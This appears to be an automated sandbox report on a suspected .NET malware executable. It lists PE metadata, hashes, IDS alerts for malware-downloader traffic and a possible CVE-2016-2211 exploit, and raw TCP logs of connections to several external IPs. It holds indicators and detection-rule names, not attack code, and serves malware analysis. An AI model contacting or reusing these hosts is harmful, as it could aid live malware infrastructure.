                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!P1g............................n+... ...@....@.. ....................................`................................
                                                              Icon Hash:00928e8e8686b000
                                                              Entrypoint:0x532b6e
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x67315021 [Mon Nov 11 00:30:25 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                              Instruction
                                                              jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x132b20         0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x134000         0x5b8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x136000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity   File Type  Entropy              Characteristics
.text   0x2000           0x130b74      0x130c00  c1ba4cccaebc52a3b4ac0236e43b464f  False     0.36893954445242  data       5.617292206349071    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x134000         0x5b8         0x600     626dc4aa653d05803fe56d8d96a5dea9  False     0.419921875       data       4.112783012034487    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x136000         0xc           0x200     d01b7acf3449ce74c1fc48a57271ec07  False     0.044921875       data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA       Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0x1340a0  0x32c  data                                                                                                  0.4211822660098522
RT_MANIFEST  0x1343cc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                                               Severity  Source IP      Source Port  Dest IP         Dest Port  Protocol
2024-11-11T05:16:56.352623+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                       2         192.168.2.5    49705        132.226.247.73  80         TCP
2024-11-11T05:16:57.930766+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                       2         192.168.2.5    49705        132.226.247.73  80         TCP
2024-11-11T05:16:58.428709+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H                        3         192.168.2.5    49707        188.114.96.3    443        TCP
2024-11-11T05:16:59.149588+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                       2         192.168.2.5    49708        132.226.247.73  80         TCP
2024-11-11T05:17:01.368274+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                       2         192.168.2.5    49710        132.226.247.73  80         TCP
2024-11-11T05:17:01.848385+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H                        3         192.168.2.5    49711        188.114.96.3    443        TCP
2024-11-11T05:17:03.078110+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H                        3         192.168.2.5    49713        188.114.96.3    443        TCP
2024-11-11T05:17:05.539673+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H                        3         192.168.2.5    49717        188.114.96.3    443        TCP
2024-11-11T05:17:10.149548+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                       2         192.168.2.5    49722        132.226.247.73  80         TCP
2024-11-11T05:17:10.824223+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         52.149.20.212  443          192.168.2.5     49721      TCP
2024-11-11T05:17:11.415202+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                       2         192.168.2.5    49722        132.226.247.73  80         TCP
2024-11-11T05:17:11.909969+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H                        3         192.168.2.5    49730        188.114.96.3    443        TCP
2024-11-11T05:17:12.666977+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                       2         192.168.2.5    49731        132.226.247.73  80         TCP
2024-11-11T05:17:14.709802+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H                        3         192.168.2.5    49746        188.114.96.3    443        TCP
2024-11-11T05:17:15.949361+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H                        3         192.168.2.5    49758        188.114.96.3    443        TCP
2024-11-11T05:17:49.378677+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         52.149.20.212  443          192.168.2.5     50009      TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 11, 2024 05:16:53.948497057 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.949157000 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.949218035 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.950119972 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.950182915 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.950548887 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.950604916 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.951427937 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.951484919 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.952002048 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.952047110 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.952651978 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.952704906 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.953102112 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.953159094 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.953887939 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.953943014 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.954639912 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.954713106 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.954868078 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.954968929 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.955311060 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.955370903 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.956106901 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.956161976 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.956670046 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.956717968 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.957331896 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.957387924 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.958019972 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.958076000 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.958698034 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.958750963 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.959244013 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.959295034 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.960010052 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.960059881 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.960609913 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.960659027 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.961343050 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.961397886 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.962090015 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.962141991 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.962723017 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.962779999 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.963455915 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.963512897 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.964011908 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.964061022 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.964843988 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.964898109 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.965645075 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.965692043 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.966375113 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.966423035 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.966439009 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.966471910 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.966650963 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.966979027 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.967031002 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.967878103 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.967930079 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.968826056 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.968878984 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.969613075 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.969661951 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.970169067 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.970226049 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.970946074 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.970993996 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.972294092 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.972343922 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.974025011 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.974080086 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.976241112 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.976289034 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.977410078 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.977488041 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.977858067 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.977926016 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.979778051 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.979829073 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.981290102 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.981364965 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.986562967 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.986612082 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.989303112 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.989375114 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.996607065 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.996694088 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.997364998 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.997440100 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.997893095 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.997968912 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.998651028 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.998718023 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.999252081 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.999317884 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.011884928 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.011965036 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.029186010 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.029284000 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.029937029 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.030006886 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.030435085 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.030495882 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.031270027 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.031330109 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.031882048 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.031965017 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.032198906 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.032284021 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.032535076 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.032578945 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.032588959 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.032602072 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.032668114 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.109963894 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:55.418708086 CET4970580192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:55.423640966 CET8049705132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:55.423706055 CET4970580192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:55.423974991 CET4970580192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:55.428741932 CET8049705132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:56.081047058 CET8049705132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:56.085685968 CET4970580192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:56.090612888 CET8049705132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:56.295783043 CET8049705132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:56.341337919 CET49706443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:56.341382027 CET44349706188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:56.341675043 CET49706443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:56.345562935 CET49706443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:56.345572948 CET44349706188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:56.352622986 CET4970580192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:56.775665998 CET44349706188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:56.775814056 CET49706443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:56.844139099 CET49706443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:56.844156981 CET44349706188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:56.844481945 CET44349706188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:56.899508953 CET49706443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:57.208947897 CET49706443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:57.255333900 CET44349706188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:57.664592981 CET44349706188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:57.664660931 CET44349706188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:57.664731026 CET49706443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:57.670162916 CET49706443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:57.673269987 CET4970580192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:57.678081989 CET8049705132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:57.882739067 CET8049705132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:57.884785891 CET49707443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:57.884819031 CET44349707188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:57.884891033 CET49707443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:57.885135889 CET49707443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:57.885150909 CET44349707188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:57.930766106 CET4970580192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:58.312297106 CET44349707188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:58.314560890 CET49707443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:58.314579010 CET44349707188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:58.428734064 CET44349707188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:58.428790092 CET44349707188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:58.428839922 CET49707443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:58.429260969 CET49707443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:58.434218884 CET4970580192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:58.436206102 CET4970880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:58.439394951 CET8049705132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:58.439446926 CET4970580192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:58.441040039 CET8049708132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:58.441107035 CET4970880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:58.441224098 CET4970880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:58.446111917 CET8049708132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:59.099508047 CET8049708132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:16:59.100924015 CET49709443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:59.100960016 CET44349709188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:59.101026058 CET49709443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:59.101255894 CET49709443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:59.101269007 CET44349709188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:59.149588108 CET4970880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:16:59.837053061 CET44349709188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:16:59.860383034 CET49709443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:16:59.860400915 CET44349709188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:00.651257992 CET44349709188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:00.651355028 CET44349709188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:00.651406050 CET49709443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:00.651860952 CET49709443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:00.654959917 CET4970880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:00.655970097 CET4971080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:00.660109997 CET8049708132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:00.660175085 CET4970880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:00.660787106 CET8049710132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:00.660849094 CET4971080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:00.660936117 CET4971080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:00.665740013 CET8049710132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:01.318558931 CET8049710132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:01.319719076 CET49711443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:01.319744110 CET44349711188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:01.319799900 CET49711443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:01.320060968 CET49711443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:01.320075035 CET44349711188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:01.368273973 CET4971080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:01.745368958 CET44349711188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:01.746823072 CET49711443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:01.746846914 CET44349711188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:01.848431110 CET44349711188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:01.848485947 CET44349711188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:01.848539114 CET49711443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:01.849014044 CET49711443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:01.852952957 CET4971280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:01.857822895 CET8049712132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:01.858004093 CET4971280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:01.858141899 CET4971280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:01.862972021 CET8049712132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:02.517927885 CET8049712132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:02.534344912 CET49713443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:02.534385920 CET44349713188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:02.534447908 CET49713443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:02.537991047 CET49713443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:07.881181002 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.882051945 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.882095098 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.882819891 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.882869959 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.883553028 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.883598089 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.883893013 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.883943081 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.885488987 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.885545969 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.885674953 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.885731936 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.886194944 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.886240959 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.886948109 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.887006044 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.887327909 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.887381077 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.888097048 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.888143063 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.888827085 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.888881922 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.889254093 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.889302969 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.890270948 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.890324116 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.890847921 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.890902042 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.891364098 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.891422033 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.892010927 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.892055035 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.892728090 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.892775059 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.898511887 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.898576975 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.926548958 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.926620960 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.927022934 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.927083015 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.927886009 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.927936077 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.928456068 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.928514004 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.929156065 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.929220915 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.937458992 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.937582016 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.947040081 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.947109938 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.947632074 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.947680950 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.948252916 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.948301077 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.948621035 CET44349719185.78.221.73192.168.2.5
